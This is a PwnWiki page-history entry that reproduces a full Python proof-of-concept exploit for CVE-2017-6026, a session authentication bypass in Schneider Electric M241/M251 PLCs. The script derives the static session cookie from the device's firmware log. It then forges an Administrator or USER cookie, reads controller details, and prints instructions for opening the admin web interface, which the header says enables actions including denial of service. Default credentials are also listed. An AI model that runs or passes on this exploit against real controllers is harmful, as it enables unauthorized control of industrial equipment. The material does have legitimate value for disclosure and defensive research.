https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2017-6026_Schneider_Electric_PLC_%E6%9C%83%E8%A9%B1%E8%AA%8D%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E 2026-04-20T09:26:19Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2017-6026_Schneider_Electric_PLC_%E6%9C%83%E8%A9%B1%E8%AA%8D%E8%AD%89%E7%B9%9E%E9%81%8E%E6%BC%8F%E6%B4%9E&diff=671&oldid=prev 2021-03-27T02:30:11Z

<p>Created page with &quot;==POC== &lt;pre&gt; #! /usr/bin/env python &#039;&#039;&#039; Copyright 2018 Photubias(c) # Exploit Title: Schneider Session Calculation - CVE-2017-6026 # Date: 2018-09-30 # Exploi...&quot;</p> <p><b>New page</b></p><div>==POC==<br /> &lt;pre&gt;<br /> #! /usr/bin/env python<br /> '''<br /> Copyright 2018 Photubias(c)<br /> # Exploit Title: Schneider Session Calculation - CVE-2017-6026<br /> # Date: 2018-09-30<br /> # Exploit Author: Deneut Tijl<br /> # Vendor Homepage: www.schneider-electric.com<br /> # Software Link: https://www.schneider-electric.com/en/download/document/M241-M251+Firmware+v4.0.3.20/<br /> # Version: Schneider Electric PLC 4.0.2.11 &amp; Boot v0.0.2.11<br /> # CVE : CVE-2017-6026<br /> <br /> This program is free software: you can redistribute it and/or modify<br /> it under the terms of the GNU General Public License as published by<br /> the Free Software Foundation, either version 3 of the License, or<br /> (at your option) any later version.<br /> <br /> This program is distributed in the hope that it will be useful,<br /> but WITHOUT ANY WARRANTY; without even the implied warranty of<br /> MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the<br /> GNU General Public License for more details.<br /> <br /> You should have received a copy of the GNU General Public License<br /> along with this program. If not, see &lt;http://www.gnu.org/licenses/&gt;.<br /> <br /> File name CVE-2017-6026-SchneiderSessionCalculation.py<br /> written by tijl[dot]deneut[at]howest[dot]be<br /> <br /> Tested on the Schneider TM241 PLC with Firmware 4.0.2.11 &amp; Boot 0.0.2.11.<br /> Firmware: https://www.schneider-electric.com/en/download/document/M241-M251+Firmware+v4.0.3.20/<br /> Security Note: https://www.schneider-electric.com/en/download/document/SEVD-2017-075-02/<br /> <br /> This script will calculate the website session cookie, which is static after every reboot.<br /> (This cookie is actually the Epoch time at PLC startup)<br /> The only prerequisite is that, since the reboot, a user must have been logged in.<br /> E.g. Administrator (with default password 'admin')<br /> or USER (with default password 'USER')<br /> <br /> After retrieving the cookie, various website actions are possible (including a DoS).<br /> Sample output:<br /> C:\Users\admin\Desktop&gt;SchneiderGetSession.py<br /> Please enter an IP [10.10.36.224]:<br /> This device has booted 33 times<br /> Cookie: 1521612584 (22/03/2018 06:09:44.014)<br /> ----------------<br /> --- Device: TM241CE40R<br /> --- MAC Address: 0080F40B24E0<br /> --- Firmware: 4.0.2.11<br /> --- Controller: Running<br /> ----------------<br /> Press Enter to close<br /> '''<br /> import urllib2<br /> <br /> strIP = raw_input('Please enter an IP [10.10.36.224]: ')<br /> if strIP == '': strIP = '10.10.36.224'<br /> FwLogURL = 'http://' + strIP + '/usr/Syslog/FwLog.txt'<br /> try:<br /> FwLogResp = urllib2.urlopen(urllib2.Request(FwLogURL)).readlines()<br /> NumberOfPowerOns = 0<br /> for line in FwLogResp:<br /> if 'Firmware core2' in line:<br /> NumberOfPowerOns += 1<br /> CookieVal = line.split(' ')[1]<br /> BootupTime = line.split('(')[1].split(')')[0]<br /> NumberOfPowerOns /= 2<br /> except:<br /> print('Error: URL not found.')<br /> raw_input('Press enter to exit')<br /> exit()<br /> <br /> try:<br /> CookieVal<br /> except:<br /> print('Error: ' + FwLogURL + ' does not contain the necessary data.')<br /> raw_input('Press Enter to Exit')<br /> exit()<br /> <br /> print('This device has booted ' + str(NumberOfPowerOns) + ' times')<br /> print('Cookie: ' + CookieVal + ' (' + BootupTime + ')')<br /> print('----------------')<br /> raw_input('Press enter to see if the cookie is set on the webserver.'+&quot;\n&quot;)<br /> <br /> CtrlURL = 'http://' + strIP + '/plcExchange/getValues/'<br /> CtrlPost = 'S;100;0;136;s;s;S;2;0;24;w;d;S;1;0;8;B;d;S;1;0;9;B;d;S;1;0;10;B;d;S;1;0;11;B;d;'<br /> <br /> try:<br /> CtrlUser = 'Administrator'<br /> DataReq = urllib2.Request(CtrlURL, CtrlPost, headers={'Cookie':'M258_LOG=' + CtrlUser + ':' + CookieVal})<br /> DataResp = urllib2.urlopen(DataReq).read()<br /> except:<br /> print('Failure for user \'Administrator\'')<br /> try:<br /> CtrlUser = 'USER'<br /> DataReq = urllib2.Request(CtrlURL, CtrlPost, headers={'Cookie':'M258_LOG=' + CtrlUser + ':' + CookieVal})<br /> DataResp = urllib2.urlopen(DataReq).read()<br /> except:<br /> print('Failure for user \'USER\'')<br /> raw_input('Press enter to exit')<br /> print('### SUCCESS (' + CtrlUser + ') ###')<br /> print('--- Device: ' + DataResp.split(' ')[0])<br /> print('--- MAC Address: ' + DataResp.split(';')[0].split(' ')[1][1:])<br /> print('--- Firmware: ' + DataResp.split(';')[2] + '.' + DataResp.split(';')[3] + '.' +DataResp.split(';')[4] + '.' +DataResp.split(';')[5])<br /> state = DataResp.split(';')[1]<br /> if state == '2':<br /> print('--- Controller: Running')<br /> elif state == '1':<br /> print('--- Controller: Stopped')<br /> elif state == '0':<br /> print('--- Controller: ERROR mode')<br /> print('')<br /> print('--- To exploit: Create cookie for domain &quot;'+strIP+'&quot;')<br /> print(' with name &quot;M258_LOG&quot; and value &quot;'+CtrlUser+':'+CookieVal+'&quot;')<br /> print(' and open &quot;http://'+strIP+'/index2.htm&quot;')<br /> print('')<br /> print('----------------')<br /> <br /> raw_input('Press enter to close')<br /> exit() <br /> &lt;/pre&gt;</div>

Pwnwiki